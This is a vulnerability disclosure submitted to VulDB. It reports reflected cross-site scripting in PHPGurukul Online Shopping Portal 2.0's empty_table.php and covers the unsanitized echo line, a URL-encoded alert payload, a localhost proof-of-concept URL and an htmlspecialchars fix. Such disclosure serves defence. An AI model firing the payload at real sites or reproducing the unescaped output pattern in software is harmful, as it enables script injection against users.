[go: up one dir, main page]
More Web Proxy on the site http://driver.im/

Submit #436377: PHPGurukul Online Shopping Portal 2.0 Improper Neutralization of Alternate XSS Syntaxinfo

TitlePHPGurukul Online Shopping Portal 2.0 Improper Neutralization of Alternate XSS Syntax
Description# [XSS vulnerability] found in Online Shopping Portal 2.0 - (empty_table.php) Affected Project: **Online Shopping Portal** Platform: Web/Php Vendor: PHPGurukul Official Website: (https://phpgurukul.com/shopping-portal-free-download/) Version: 2.0 Updated: 06 June 2024 Vulnerable path/file: admin/assets/plugins/DataTables/media/unit_testing/templates/empty_table.php Injection parameter: `scripts` Size: 30.5 MB Sha256: 127e719bf4236a9140f146dd7a6ae54f2a9234b9e6f0aeda240e7a4905c6e73c ## Vulnerability Description: The issue arises in the `$aScripts[$i]` variable that can be influenced by user input directly echoing the constructed `<script>` tag into the HTML output, including the user-controlled part within the src attribute without any sanitization. This allows an attacker to inject arbitrary HTML or JavaScript code leading to an XSS attack. ## Vulnerable code: echo '<script type="text/javascript" language="javascript" src="../'.$aScripts[$i].'?rand='.rand().'"></script>' ## Injection Payload Tested: We need to set the `scripts` to an encoded url payload to make it work: %22%3E%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E ## Execution: When the browser parses this, it executes the `%22%3E%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E` code, resulting in a popup displaying `"XSS"`. ## Demonstration: Below is how `empty_table.php` looks like: https://i.postimg.cc/wMCcqwGJ/1.png Then we can add our payload `%22%3E%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E`: http://localhost/shopping/admin/assets/plugins/DataTables/media/unit_testing/templates/empty_table.php?scripts=%22%3E%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E After submitting the url with the payload `%22%3E%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E`, XSS is triggered: https://i.postimg.cc/kMzkRqrN/2.png ## Recommendation for Preventing XSS: To fix this vulnerability, we must always sanitize user inputs before rendering them in the HTML. We can use functions like htmlspecialchars() in PHP to encode special characters. Example: echo '<script type="text/javascript" language="javascript" src="../' . htmlspecialchars($aScripts[$i], ENT_QUOTES, 'UTF-8') . '?rand=' . rand() . '"></script>'; > One Click Can Change Everything: Be Secure.
Source⚠️ https://github.com/secuserx/CVE/blob/main/%5BXSS%20vulnerability%5D%20found%20in%20Online%20Shopping%20Portal%202.0%20-%20(empty_table.php).md
User
 secuserx (UID 76735)
Submission02.11.2024 22:44 (vor 3 Monaten)
Moderation03.11.2024 08:06 (9 hours later)
StatusAkzeptiert
VulDB Entry282924 [PHPGurukul Online Shopping Portal 2.0 empty_table.php scripts cross site scripting]
Points20

ZurückÜbersichtWeiter

Do you know our Splunk app?

Download it now for free!